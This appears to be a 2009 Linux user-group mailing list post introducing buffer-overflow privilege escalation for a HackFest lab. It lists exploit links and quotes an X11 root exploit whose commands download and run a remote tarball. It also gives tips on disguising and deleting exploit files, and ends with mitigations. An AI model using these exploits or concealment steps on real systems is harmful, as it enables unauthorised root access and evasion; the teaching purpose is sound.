Buffer Overflows 101
Good List (from the Backtrack3 Web Archives):
http://milw0rm.com/platforms/linux
Practical Examples:
1) linux kernel Exploits
http://milw0rm.com/exploits/2031
Affects
2.6.13 && < 2.6.17.4
Just one of many available buffer overflows in linux - to escalate privileges
to root:
2) snort
http://milw0rm.com/exploits/3609
3) mysql
http://milw0rm.com/exploits/1518
4) Known Ubuntu 8.10 Overflows:
http://news.softpedia.com/news/Linux-Kernel-Vulnerability-in-Ubuntu-8-10-Update-Today-97543.shtml
Exploit file from http://milw0rm.com/exploits/1596
--------------------------------------------------------------------------------
# From Daniel Stone's Advisory
# xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates
# of X11R7.0, is vulnerable.
# X11R6.9.0, and all release candidates, are vulnerable.
# X11R6.8.2 and earlier versions are not vulnerable.
# The rest is H D Moore from metasploit
Two second exploit, but if anyone is lazy:
$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c
X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0
[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...
# backup: http://www.milw0rm.com/sploits/xmodulepath.tgz
# milw0rm.com [2006-03-20]
---------------------------------end original
example-------------------------------
REMEMBER! All scripts are disabled and obfuscated so they are only available
to those who are intelligent enough to also be ETHICAL. If you are too
clueless to use this script, you are not clueful enough to stay out of trouble
(jail, $myservers, schools, .edu, .gov, etc.). So if you can't read and
comment that script, you can't run it.
General C How To:
You will need to copy the code to the server of choice. Cut and splice will
work, unless you are using a Windows systems (beware of glowing ^M's!). We are
going to copy it to a filename.c that obfuscates it's true function, like
testfile.c and compile it to something like "grepfile" like a real $badguy
would.
Once you have the source code on the test server in our practical example, you
are going to need to compile it.
$ gcc -o grepfile test.c
If your file is named test.c then type '-o grepfile'
as the parameter to gcc. This is basically your suggested name
for the executable file that gcc would create. In case you
typed
something like the following
$ gcc test.c
You would be having a a.out in the same directory as the source
C file. This is the default name of the executable that gcc
creates.
This would create problems when you compile many programs in
one
directory. So you override this with the -o option followed by
the name of the executable
$ gcc -o grepfile2 test2.c
Would create an executable by the name grepfile2 for your
source
code named test2.c
Running the executable that you created is as simple as typing
the following at the prompt.
$ ./grepfile
OR
$ ./grepfile2
It's a good idea to remove your .c source after building so that your directory
looks innocent like a $badguy would.
After your code runs, you should have a fine shell.
I was able to run the mysql example on the December HackFest Fedora Core 10
system successfully to obtain root Mysql privileges (instructions for build in
the script.)
I was also able to run the X11 script. Be careful - it will restart X on
Redhat or FC 10!. It works on unpatched Ubuntu 8.10!
All you would need is "access" to a shell for buffer overflow exploits.
Mitigating Buffer Overflows
1) Remove gcc, cc, and gdb
2) Be sure that the kernel running has /proc/kernel buffer overflow protections
3) NX (no execute) kernel patch protection for older kernels [know your version
vulnerabilities]
4) SSH externally off; internal trust and access severely limited
www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
(503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security
Forensics @ UAT 1/10/09 12-3PM
Take the Black [Linux BT3] Pill and leave the InSecurity Matrix, or take the
Blue MS Pill and stay happily ignorant.
_________________________________________________________________
Suspicious message? There’s an alert for that.
http://windowslive.com/Explore/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_broad2_122008---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
